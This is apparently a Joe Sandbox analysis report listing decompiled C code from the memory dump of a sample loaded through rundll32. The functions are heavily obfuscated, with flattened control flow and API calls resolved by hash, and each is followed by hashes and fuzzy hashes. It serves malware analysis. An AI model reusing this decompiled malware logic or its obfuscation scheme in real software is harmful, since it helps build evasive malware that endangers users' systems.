                                                                                                                      						}
                                                                                                                      						return _t251;
                                                                                                                      					}
                                                                                                                      					E00698F9E(_v16, _v76, _v80, _v48, _t224);
                                                                                                                      					_t261 =  &(_t261[3]);
                                                                                                                      					_t225 = 0x8a80d0f;
                                                                                                                      					_t218 = 0x9850ebe;
                                                                                                                      					_t246 = 0x5c;
                                                                                                                      					goto L22;
                                                                                                                      				}
                                                                                                                      			}












































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ^T$mU`
                                                                                                                      • API String ID: 0-1245783925
                                                                                                                      • Opcode ID: 33f334b798bbbe12c0e0e6a2e763db6d41bbe2b6c4420b74d4b0ef1edb042458
                                                                                                                      • Instruction ID: 0279eaec80e2b4cc30f3607030fb84253d06e7cd1ffa89a24b10c82543934175
                                                                                                                      • Opcode Fuzzy Hash: 33f334b798bbbe12c0e0e6a2e763db6d41bbe2b6c4420b74d4b0ef1edb042458
                                                                                                                      • Instruction Fuzzy Hash: 86B141715093409FC758CF25898981BFBE2FBC8758F108A1DF69A96260D7B1CA0ACF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0069A666(intOrPtr* __ecx) {
                                                                                                                      				char _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				intOrPtr* _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				void* _t185;
                                                                                                                      				void* _t187;
                                                                                                                      				signed int _t194;
                                                                                                                      				signed int _t203;
                                                                                                                      				intOrPtr* _t204;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int _t234;
                                                                                                                      				signed int _t235;
                                                                                                                      				void* _t236;
                                                                                                                      				signed int _t239;
                                                                                                                      				signed int* _t240;
                                                                                                                      
                                                                                                                      				_t204 = __ecx;
                                                                                                                      				_t240 =  &_v208;
                                                                                                                      				_v144 = __ecx;
                                                                                                                      				_v188 = 0x57b051;
                                                                                                                      				_v188 = _v188 ^ 0x0e33ee27;
                                                                                                                      				_v188 = _v188 * 0x1d;
                                                                                                                      				_t236 = 0xac5721c;
                                                                                                                      				_v188 = _v188 << 4;
                                                                                                                      				_v188 = _v188 ^ 0x15e508b7;
                                                                                                                      				_v156 = 0xb3c586;
                                                                                                                      				_v156 = _v156 + 0xc4f5;
                                                                                                                      				_v156 = _v156 ^ 0x00bed25a;
                                                                                                                      				_v168 = 0x711032;
                                                                                                                      				_v168 = _v168 << 8;
                                                                                                                      				_v168 = _v168 + 0x5169;
                                                                                                                      				_v168 = _v168 ^ 0x711dace8;
                                                                                                                      				_v192 = 0xa2549d;
                                                                                                                      				_v192 = _v192 + 0x52ae;
                                                                                                                      				_v192 = _v192 >> 1;
                                                                                                                      				_v192 = _v192 >> 3;
                                                                                                                      				_v192 = _v192 ^ 0x000eb53b;
                                                                                                                      				_v140 = 0xe7e5a1;
                                                                                                                      				_t231 = 0x32;
                                                                                                                      				_v140 = _v140 * 0x50;
                                                                                                                      				_v140 = _v140 ^ 0x4874e895;
                                                                                                                      				_v208 = 0x1967bb;
                                                                                                                      				_v208 = _v208 << 4;
                                                                                                                      				_v208 = _v208 | 0x201d9a42;
                                                                                                                      				_v208 = _v208 / _t231;
                                                                                                                      				_v208 = _v208 ^ 0x00a7f54f;
                                                                                                                      				_v152 = 0x52a7fc;
                                                                                                                      				_v152 = _v152 + 0x45a2;
                                                                                                                      				_v152 = _v152 ^ 0x0052edd3;
                                                                                                                      				_v160 = 0x3027b3;
                                                                                                                      				_v160 = _v160 + 0xfd14;
                                                                                                                      				_v160 = _v160 ^ 0x0036c553;
                                                                                                                      				_v180 = 0x38862e;
                                                                                                                      				_v180 = _v180 ^ 0x0f350481;
                                                                                                                      				_t232 = 0x7c;
                                                                                                                      				_v180 = _v180 * 0x65;
                                                                                                                      				_v180 = _v180 ^ 0xf053ee57;
                                                                                                                      				_v136 = 0x356a19;
                                                                                                                      				_v136 = _v136 ^ 0xbed63dcb;
                                                                                                                      				_v136 = _v136 ^ 0xbeeb3706;
                                                                                                                      				_v164 = 0x14aaf;
                                                                                                                      				_v164 = _v164 + 0xffffc1af;
                                                                                                                      				_v164 = _v164 ^ 0x000285a1;
                                                                                                                      				_v200 = 0x7f3e04;
                                                                                                                      				_v200 = _v200 * 0x53;
                                                                                                                      				_v200 = _v200 + 0xffffdc1b;
                                                                                                                      				_v200 = _v200 + 0x69f9;
                                                                                                                      				_v200 = _v200 ^ 0x2945b47b;
                                                                                                                      				_v148 = 0xc6ed1e;
                                                                                                                      				_v148 = _v148 >> 6;
                                                                                                                      				_v148 = _v148 ^ 0x0006dab0;
                                                                                                                      				_v172 = 0x6d07b9;
                                                                                                                      				_v172 = _v172 / _t232;
                                                                                                                      				_t233 = 0x35;
                                                                                                                      				_v172 = _v172 / _t233;
                                                                                                                      				_v172 = _v172 ^ 0x00041e3e;
                                                                                                                      				_v204 = 0x57aab;
                                                                                                                      				_v204 = _v204 + 0xdcdc;
                                                                                                                      				_v204 = _v204 * 0x48;
                                                                                                                      				_v204 = _v204 << 8;
                                                                                                                      				_v204 = _v204 ^ 0xc89fb5e3;
                                                                                                                      				_v132 = 0xff84eb;
                                                                                                                      				_v132 = _v132 << 5;
                                                                                                                      				_v132 = _v132 ^ 0x1ff23c26;
                                                                                                                      				_v196 = 0xcb0ee1;
                                                                                                                      				_v196 = _v196 | 0xd8d8bfc1;
                                                                                                                      				_v196 = _v196 << 4;
                                                                                                                      				_v196 = _v196 ^ 0x8dbe7284;
                                                                                                                      				_v184 = 0x3f345e;
                                                                                                                      				_t234 = 0x7b;
                                                                                                                      				_v184 = _v184 * 0x5e;
                                                                                                                      				_v184 = _v184 ^ 0x1738d684;
                                                                                                                      				_v176 = 0x75d12f;
                                                                                                                      				_t239 = _v184;
                                                                                                                      				_t203 = _v184;
                                                                                                                      				_t235 = _v184;
                                                                                                                      				_v176 = _v176 / _t234;
                                                                                                                      				_v176 = _v176 + 0xb925;
                                                                                                                      				_v176 = _v176 ^ 0x0007fac1;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t185 = 0x80ddafd;
                                                                                                                      					do {
                                                                                                                      						while(_t236 != 0x3002390) {
                                                                                                                      							if(_t236 == _t185) {
                                                                                                                      								_push(_v204);
                                                                                                                      								_push(_v172);
                                                                                                                      								_t187 = E0069DCF7(_v148, 0x681540, __eflags);
                                                                                                                      								_push(_t235);
                                                                                                                      								_push( &_v128);
                                                                                                                      								_push(_t187);
                                                                                                                      								_push(_t239);
                                                                                                                      								_push(_t203);
                                                                                                                      								 *((intOrPtr*)(E0068A42D(0xab2a8d8a, 0x2b7)))();
                                                                                                                      								E0068A8B0(_v132, _t187, _v196);
                                                                                                                      								_t236 = 0xc2d90a2;
                                                                                                                      								goto L11;
                                                                                                                      							} else {
                                                                                                                      								if(_t236 == 0x94501ee) {
                                                                                                                      									_t194 = E00690AE0(0x10, 1);
                                                                                                                      									_push(_v140);
                                                                                                                      									_t239 = _t194;
                                                                                                                      									_push( &_v128);
                                                                                                                      									_push(_t239);
                                                                                                                      									_push(0xb);
                                                                                                                      									E006880E3(_v168, _v192);
                                                                                                                      									_t236 = 0x3002390;
                                                                                                                      									L11:
                                                                                                                      									_t240 =  &(_t240[6]);
                                                                                                                      									L12:
                                                                                                                      									_t204 = _v144;
                                                                                                                      									goto L1;
                                                                                                                      								} else {
                                                                                                                      									if(_t236 == 0xac5721c) {
                                                                                                                      										_t236 = 0x94501ee;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t236 == 0xc2d90a2) {
                                                                                                                      											E00698519(_v184, _v176, _t235);
                                                                                                                      										} else {
                                                                                                                      											if(_t236 != 0xd4e1cec) {
                                                                                                                      												goto L17;
                                                                                                                      											} else {
                                                                                                                      												_t239 = 0x4000;
                                                                                                                      												_push(_t204);
                                                                                                                      												_push(_t204);
                                                                                                                      												_t203 = E00687FF2(0x4000);
                                                                                                                      												_t185 = 0x80ddafd;
                                                                                                                      												_t204 = _v144;
                                                                                                                      												_t236 =  !=  ? 0x80ddafd : 0xc2d90a2;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L20:
                                                                                                                      							return _t203;
                                                                                                                      						}
                                                                                                                      						_t235 = E00684816(_v208,  *((intOrPtr*)(_t204 + 4)), _v152,  *_t204, _v160, _v180);
                                                                                                                      						_t240 =  &(_t240[4]);
                                                                                                                      						__eflags = _t235;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							_t204 = _v144;
                                                                                                                      							_t236 = 0x99c1651;
                                                                                                                      							_t185 = 0x80ddafd;
                                                                                                                      							goto L17;
                                                                                                                      						} else {
                                                                                                                      							_t236 = 0xd4e1cec;
                                                                                                                      							goto L12;
                                                                                                                      						}
                                                                                                                      						goto L20;
                                                                                                                      						L17:
                                                                                                                      						__eflags = _t236 - 0x99c1651;
                                                                                                                      					} while (__eflags != 0);
                                                                                                                      					goto L20;
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x0069a7e3
                                                                                                                      0x0069a7eb
                                                                                                                      0x0069a7f3
                                                                                                                      0x0069a7f8
                                                                                                                      0x0069a800
                                                                                                                      0x0069a810
                                                                                                                      0x0069a818
                                                                                                                      0x0069a81b
                                                                                                                      0x0069a81f
                                                                                                                      0x0069a827
                                                                                                                      0x0069a82f
                                                                                                                      0x0069a83c
                                                                                                                      0x0069a842
                                                                                                                      0x0069a847
                                                                                                                      0x0069a84f
                                                                                                                      0x0069a857
                                                                                                                      0x0069a85c
                                                                                                                      0x0069a864
                                                                                                                      0x0069a86c
                                                                                                                      0x0069a874
                                                                                                                      0x0069a879
                                                                                                                      0x0069a881
                                                                                                                      0x0069a890
                                                                                                                      0x0069a891
                                                                                                                      0x0069a895
                                                                                                                      0x0069a89d
                                                                                                                      0x0069a8ab
                                                                                                                      0x0069a8af
                                                                                                                      0x0069a8b3
                                                                                                                      0x0069a8b7
                                                                                                                      0x0069a8bb
                                                                                                                      0x0069a8c3
                                                                                                                      0x0069a8cb
                                                                                                                      0x0069a8cb
                                                                                                                      0x0069a8cb
                                                                                                                      0x0069a8d0
                                                                                                                      0x0069a8d0
                                                                                                                      0x0069a8de
                                                                                                                      0x0069a983
                                                                                                                      0x0069a98c
                                                                                                                      0x0069a994
                                                                                                                      0x0069a99b
                                                                                                                      0x0069a9a7
                                                                                                                      0x0069a9a8
                                                                                                                      0x0069a9a9
                                                                                                                      0x0069a9aa
                                                                                                                      0x0069a9b6
                                                                                                                      0x0069a9c2
                                                                                                                      0x0069a9c7
                                                                                                                      0x00000000
                                                                                                                      0x0069a8e4
                                                                                                                      0x0069a8ea
                                                                                                                      0x0069a952
                                                                                                                      0x0069a957
                                                                                                                      0x0069a95f
                                                                                                                      0x0069a969
                                                                                                                      0x0069a96a
                                                                                                                      0x0069a96b
                                                                                                                      0x0069a96d
                                                                                                                      0x0069a972
                                                                                                                      0x0069a977
                                                                                                                      0x0069a977
                                                                                                                      0x0069a97a
                                                                                                                      0x0069a97a
                                                                                                                      0x00000000
                                                                                                                      0x0069a8ec
                                                                                                                      0x0069a8f2
                                                                                                                      0x0069a93f
                                                                                                                      0x00000000
                                                                                                                      0x0069a8f4
                                                                                                                      0x0069a8fa
                                                                                                                      0x0069aa1d
                                                                                                                      0x0069a900
                                                                                                                      0x0069a906
                                                                                                                      0x00000000
                                                                                                                      0x0069a90c
                                                                                                                      0x0069a910
                                                                                                                      0x0069a91f
                                                                                                                      0x0069a920
                                                                                                                      0x0069a926
                                                                                                                      0x0069a930
                                                                                                                      0x0069a936
                                                                                                                      0x0069a93a
                                                                                                                      0x00000000
                                                                                                                      0x0069a93a
                                                                                                                      0x0069a906
                                                                                                                      0x0069a8fa
                                                                                                                      0x0069a8f2
                                                                                                                      0x0069a8ea
                                                                                                                      0x0069aa26
                                                                                                                      0x0069aa2f
                                                                                                                      0x0069aa2f
                                                                                                                      0x0069a9e8
                                                                                                                      0x0069a9ea
                                                                                                                      0x0069a9ed
                                                                                                                      0x0069a9ef
                                                                                                                      0x0069a9f8
                                                                                                                      0x0069a9fc
                                                                                                                      0x0069aa01
                                                                                                                      0x00000000
                                                                                                                      0x0069a9f1
                                                                                                                      0x0069a9f1
                                                                                                                      0x00000000
                                                                                                                      0x0069a9f1
                                                                                                                      0x00000000
                                                                                                                      0x0069aa06
                                                                                                                      0x0069aa06
                                                                                                                      0x0069aa06
                                                                                                                      0x00000000
                                                                                                                      0x0069aa12

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ^4?$iQ
                                                                                                                      • API String ID: 0-3971506469
                                                                                                                      • Opcode ID: f202688f8600f8c8b82e542b88060c84383661333cd595279c7a24a40096d372
                                                                                                                      • Instruction ID: f3a99f72223b9312cd5b82235a25beb060e30b55aa827f96e8b7ec7b130cc9e5
                                                                                                                      • Opcode Fuzzy Hash: f202688f8600f8c8b82e542b88060c84383661333cd595279c7a24a40096d372
                                                                                                                      • Instruction Fuzzy Hash: A9A162719083409FC354CE69C58990BFBE6BBC4758F40492EF99AA6260C7B5D94ACF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 82%
                                                                                                                      			E00698BE3() {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				void* _v88;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				signed int _t203;
                                                                                                                      				short _t206;
                                                                                                                      				short _t211;
                                                                                                                      				signed int _t214;
                                                                                                                      				void* _t216;
                                                                                                                      				intOrPtr _t238;
                                                                                                                      				void* _t239;
                                                                                                                      				void* _t240;
                                                                                                                      				short* _t241;
                                                                                                                      				short* _t242;
                                                                                                                      				signed int _t243;
                                                                                                                      				signed int _t244;
                                                                                                                      				signed int _t245;
                                                                                                                      				signed int _t246;
                                                                                                                      				signed int _t247;
                                                                                                                      				signed int _t248;
                                                                                                                      				signed int _t249;
                                                                                                                      				signed int _t250;
                                                                                                                      				void* _t251;
                                                                                                                      
                                                                                                                      				_v92 = 0x476c75;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t216 = 0xb7209d2;
                                                                                                                      				_t243 = 0x73;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_t238 =  *0x6a3e10; // 0x0
                                                                                                                      				_v16 = 0xe95677;
                                                                                                                      				_t239 = _t238 + 0x1c;
                                                                                                                      				_v16 = _v16 + 0xffffde88;
                                                                                                                      				_v16 = _v16 | 0xcd71b475;
                                                                                                                      				_v16 = _v16 + 0xffffb9cf;
                                                                                                                      				_v16 = _v16 ^ 0xcdf0e35f;
                                                                                                                      				_v48 = 0xdf79ef;
                                                                                                                      				_v48 = _v48 / _t243;
                                                                                                                      				_t244 = 0x6b;
                                                                                                                      				_v48 = _v48 * 0x6d;
                                                                                                                      				_v48 = _v48 ^ 0x00d012e0;
                                                                                                                      				_v20 = 0x9de8b4;
                                                                                                                      				_v20 = _v20 + 0xffff612d;
                                                                                                                      				_v20 = _v20 / _t244;
                                                                                                                      				_v20 = _v20 ^ 0xc642351f;
                                                                                                                      				_v20 = _v20 ^ 0xc646a40f;
                                                                                                                      				_v52 = 0x8fb5bf;
                                                                                                                      				_v52 = _v52 << 0xa;
                                                                                                                      				_v52 = _v52 | 0x07a5acc8;
                                                                                                                      				_v52 = _v52 ^ 0x3ff13d54;
                                                                                                                      				_v68 = 0x5451dc;
                                                                                                                      				_v68 = _v68 << 4;
                                                                                                                      				_v68 = _v68 ^ 0x054b95e9;
                                                                                                                      				_v56 = 0x52bd8b;
                                                                                                                      				_v56 = _v56 >> 2;
                                                                                                                      				_t245 = 0x43;
                                                                                                                      				_v56 = _v56 * 0x7a;
                                                                                                                      				_v56 = _v56 ^ 0x09d97bb2;
                                                                                                                      				_v24 = 0x3d3b88;
                                                                                                                      				_v24 = _v24 / _t245;
                                                                                                                      				_v24 = _v24 + 0xfffff551;
                                                                                                                      				_v24 = _v24 ^ 0x58fd9949;
                                                                                                                      				_v24 = _v24 ^ 0x58f7485b;
                                                                                                                      				_v28 = 0x8d7fa4;
                                                                                                                      				_v28 = _v28 | 0x74f1f66b;
                                                                                                                      				_v28 = _v28 + 0xbcb0;
                                                                                                                      				_t246 = 0x1d;
                                                                                                                      				_v28 = _v28 / _t246;
                                                                                                                      				_v28 = _v28 ^ 0x0406308a;
                                                                                                                      				_v76 = 0xb13dbd;
                                                                                                                      				_v76 = _v76 >> 4;
                                                                                                                      				_v76 = _v76 ^ 0x0001a54a;
                                                                                                                      				_v72 = 0x3dff58;
                                                                                                                      				_v72 = _v72 + 0xffff5d9c;
                                                                                                                      				_v72 = _v72 ^ 0x00301633;
                                                                                                                      				_v8 = 0xd63a62;
                                                                                                                      				_v8 = _v8 >> 4;
                                                                                                                      				_v8 = _v8 << 5;
                                                                                                                      				_v8 = _v8 ^ 0xdca434f7;
                                                                                                                      				_v8 = _v8 ^ 0xdd0cf0dc;
                                                                                                                      				_v44 = 0x6f20d8;
                                                                                                                      				_v44 = _v44 >> 0xb;
                                                                                                                      				_v44 = _v44 ^ 0xaa766a49;
                                                                                                                      				_v44 = _v44 ^ 0xaa79f73d;
                                                                                                                      				_v64 = 0x5810b3;
                                                                                                                      				_t247 = 0x3e;
                                                                                                                      				_v64 = _v64 * 0x13;
                                                                                                                      				_v64 = _v64 ^ 0x068d2e2f;
                                                                                                                      				_v60 = 0xa1705b;
                                                                                                                      				_v60 = _v60 / _t247;
                                                                                                                      				_v60 = _v60 ^ 0x000746d3;
                                                                                                                      				_v12 = 0xe49076;
                                                                                                                      				_v12 = _v12 | 0xf94b921d;
                                                                                                                      				_t248 = 0x66;
                                                                                                                      				_v12 = _v12 / _t248;
                                                                                                                      				_v12 = _v12 | 0x30c6fb91;
                                                                                                                      				_v12 = _v12 ^ 0x32fd72cc;
                                                                                                                      				_v40 = 0x4af1f5;
                                                                                                                      				_v40 = _v40 + 0xffff1f3a;
                                                                                                                      				_v40 = _v40 + 0x5998;
                                                                                                                      				_v40 = _v40 | 0x0efc634a;
                                                                                                                      				_v40 = _v40 ^ 0x0ef1d3e1;
                                                                                                                      				_v36 = 0xca0e2e;
                                                                                                                      				_v36 = _v36 + 0xa6ab;
                                                                                                                      				_v36 = _v36 * 0x17;
                                                                                                                      				_v36 = _v36 | 0xed84f45f;
                                                                                                                      				_v36 = _v36 ^ 0xffb3e96f;
                                                                                                                      				_v32 = 0x9f068d;
                                                                                                                      				_v32 = _v32 | 0xccdcedf7;
                                                                                                                      				_v32 = _v32 >> 8;
                                                                                                                      				_v32 = _v32 << 0x10;
                                                                                                                      				_v32 = _v32 ^ 0xdfe821c7;
                                                                                                                      				do {
                                                                                                                      					while(_t216 != 0x5ccdb59) {
                                                                                                                      						if(_t216 == 0x80e5149) {
                                                                                                                      							_push(_v32);
                                                                                                                      							_push(_t239);
                                                                                                                      							_push(3);
                                                                                                                      							_push(1);
                                                                                                                      							E006880E3(_v40, _v36);
                                                                                                                      							 *((short*)(_t239 + 6)) = 0;
                                                                                                                      							return 0;
                                                                                                                      						}
                                                                                                                      						if(_t216 == 0xb7209d2) {
                                                                                                                      							_t211 = E0069D25E(_t216);
                                                                                                                      							_t216 = 0x5ccdb59;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t216 != 0xeb2e9e3) {
                                                                                                                      							goto L8;
                                                                                                                      						}
                                                                                                                      						_t214 = E00690AE0(0x10, 4);
                                                                                                                      						_push(_v12);
                                                                                                                      						_t250 = _t214;
                                                                                                                      						_push(_t239);
                                                                                                                      						_push(_t250);
                                                                                                                      						_push(1);
                                                                                                                      						E006880E3(_v64, _v60);
                                                                                                                      						_t251 = _t251 + 0x18;
                                                                                                                      						_t242 = _t239 + _t250 * 2;
                                                                                                                      						_t216 = 0x80e5149;
                                                                                                                      						_t211 = 0x2e;
                                                                                                                      						 *_t242 = _t211;
                                                                                                                      						_t239 = _t242 + 2;
                                                                                                                      					}
                                                                                                                      					_t203 = E00690AE0(0x10, 4);
                                                                                                                      					_push(_v24);
                                                                                                                      					_t249 = _t203;
                                                                                                                      					_push(_t239);
                                                                                                                      					_push(1);
                                                                                                                      					_push(2);
                                                                                                                      					E006880E3(_v68, _v56);
                                                                                                                      					_push(_v72);
                                                                                                                      					_t240 = _t239 + 2;
                                                                                                                      					_push(_t240);
                                                                                                                      					_push(_t249);
                                                                                                                      					_push(1);
                                                                                                                      					E006880E3(_v28, _v76);
                                                                                                                      					_t251 = _t251 + 0x28;
                                                                                                                      					_t241 = _t240 + _t249 * 2;
                                                                                                                      					_t216 = 0xeb2e9e3;
                                                                                                                      					_t206 = 0x5c;
                                                                                                                      					 *_t241 = _t206;
                                                                                                                      					_t239 = _t241 + 2;
                                                                                                                      					L8:
                                                                                                                      				} while (_t216 != 0x3f21c37);
                                                                                                                      				return _t211;
                                                                                                                      			}











































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ulG$wV
                                                                                                                      • API String ID: 0-391097709
                                                                                                                      • Opcode ID: a95bd8f9c3a102d8b1ee39e75c0e83002d9fc015c131da99ae1b35e89d7d4da6
                                                                                                                      • Instruction ID: 953cd2d0d78d1ffa71f1c9deb6cb9909c271f5b0834bf48d0c21f197fcf8425a
                                                                                                                      • Opcode Fuzzy Hash: a95bd8f9c3a102d8b1ee39e75c0e83002d9fc015c131da99ae1b35e89d7d4da6
                                                                                                                      • Instruction Fuzzy Hash: F6915471D01219EBDF54DFA5D88A9DEBBB2FF44314F208109E216BB250D7B01A46CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00686D24() {
                                                                                                                      				char _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				signed int _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				short* _t158;
                                                                                                                      				void* _t161;
                                                                                                                      				void* _t164;
                                                                                                                      				intOrPtr _t173;
                                                                                                                      				intOrPtr _t188;
                                                                                                                      				signed int _t192;
                                                                                                                      				signed int _t193;
                                                                                                                      				signed int _t194;
                                                                                                                      				signed int _t195;
                                                                                                                      				void* _t198;
                                                                                                                      
                                                                                                                      				_v556 = 0x5b9523;
                                                                                                                      				_v556 = _v556 ^ 0xd644881d;
                                                                                                                      				_t164 = 0xafec1cc;
                                                                                                                      				_v556 = _v556 ^ 0xd61fc18a;
                                                                                                                      				_v560 = 0xf0211a;
                                                                                                                      				_v560 = _v560 >> 0xc;
                                                                                                                      				_v560 = _v560 >> 0xf;
                                                                                                                      				_v560 = _v560 ^ 0x000d86e8;
                                                                                                                      				_v536 = 0x5b86ee;
                                                                                                                      				_t192 = 0x7a;
                                                                                                                      				_v536 = _v536 / _t192;
                                                                                                                      				_v536 = _v536 ^ 0x00051f37;
                                                                                                                      				_v528 = 0x15dba1;
                                                                                                                      				_v528 = _v528 + 0xffff3226;
                                                                                                                      				_v528 = _v528 ^ 0x001c60e6;
                                                                                                                      				_v564 = 0xcdfacc;
                                                                                                                      				_v564 = _v564 ^ 0x78a7d3e3;
                                                                                                                      				_v564 = _v564 << 0xe;
                                                                                                                      				_v564 = _v564 ^ 0x8a48a6fd;
                                                                                                                      				_v572 = 0x7eccf1;
                                                                                                                      				_v572 = _v572 + 0xffffd1bc;
                                                                                                                      				_t193 = 0x2e;
                                                                                                                      				_v572 = _v572 * 0x26;
                                                                                                                      				_v572 = _v572 ^ 0x12c53124;
                                                                                                                      				_v588 = 0x8dc921;
                                                                                                                      				_v588 = _v588 | 0x53df5653;
                                                                                                                      				_v588 = _v588 << 7;
                                                                                                                      				_v588 = _v588 * 0x73;
                                                                                                                      				_v588 = _v588 ^ 0xc8beb34e;
                                                                                                                      				_v544 = 0xe1fa74;
                                                                                                                      				_v544 = _v544 + 0xffffe6ac;
                                                                                                                      				_v544 = _v544 ^ 0x00e0f2b8;
                                                                                                                      				_v568 = 0x925246;
                                                                                                                      				_v568 = _v568 + 0xffffcd65;
                                                                                                                      				_v568 = _v568 + 0xffffdee0;
                                                                                                                      				_v568 = _v568 ^ 0x009eae97;
                                                                                                                      				_v576 = 0x3c09b4;
                                                                                                                      				_v576 = _v576 + 0xffff2c4c;
                                                                                                                      				_v576 = _v576 >> 0xa;
                                                                                                                      				_v576 = _v576 ^ 0x000cc2c3;
                                                                                                                      				_v592 = 0xac7846;
                                                                                                                      				_v592 = _v592 ^ 0xbb2572b9;
                                                                                                                      				_v592 = _v592 ^ 0xeb3265e6;
                                                                                                                      				_v592 = _v592 | 0x6a541c4b;
                                                                                                                      				_v592 = _v592 ^ 0x7af30806;
                                                                                                                      				_v548 = 0xb1a24a;
                                                                                                                      				_v548 = _v548 / _t193;
                                                                                                                      				_v548 = _v548 ^ 0x00094ccb;
                                                                                                                      				_v552 = 0xbe5b93;
                                                                                                                      				_v552 = _v552 | 0xe01e3375;
                                                                                                                      				_v552 = _v552 ^ 0xe0b0d42a;
                                                                                                                      				_v532 = 0x76dce5;
                                                                                                                      				_t194 = 0x19;
                                                                                                                      				_v532 = _v532 / _t194;
                                                                                                                      				_v532 = _v532 ^ 0x00002403;
                                                                                                                      				_v584 = 0xffb3b0;
                                                                                                                      				_v584 = _v584 << 0xc;
                                                                                                                      				_v584 = _v584 ^ 0x8b2427a7;
                                                                                                                      				_v584 = _v584 | 0x0ff5fda2;
                                                                                                                      				_v584 = _v584 ^ 0x7ffdbf2b;
                                                                                                                      				_v580 = 0x6f9ecd;
                                                                                                                      				_t195 = 0x5b;
                                                                                                                      				_v580 = _v580 / _t195;
                                                                                                                      				_v580 = _v580 << 0xc;
                                                                                                                      				_v580 = _v580 ^ 0x13a22276;
                                                                                                                      				_v540 = 0xd8d341;
                                                                                                                      				_v540 = _v540 * 0xb;
                                                                                                                      				_v540 = _v540 ^ 0x095c7847;
                                                                                                                      				do {
                                                                                                                      					while(_t164 != 0x2dc4ff7) {
                                                                                                                      						if(_t164 == 0x5cfc1e4) {
                                                                                                                      							return E00689DCF(_v532, _v584, _v580,  &_v524,  &_v524, E00684EE3, _v540, 0);
                                                                                                                      						}
                                                                                                                      						if(_t164 == 0x9efe9dd) {
                                                                                                                      							_push(_v536);
                                                                                                                      							_push(_v560);
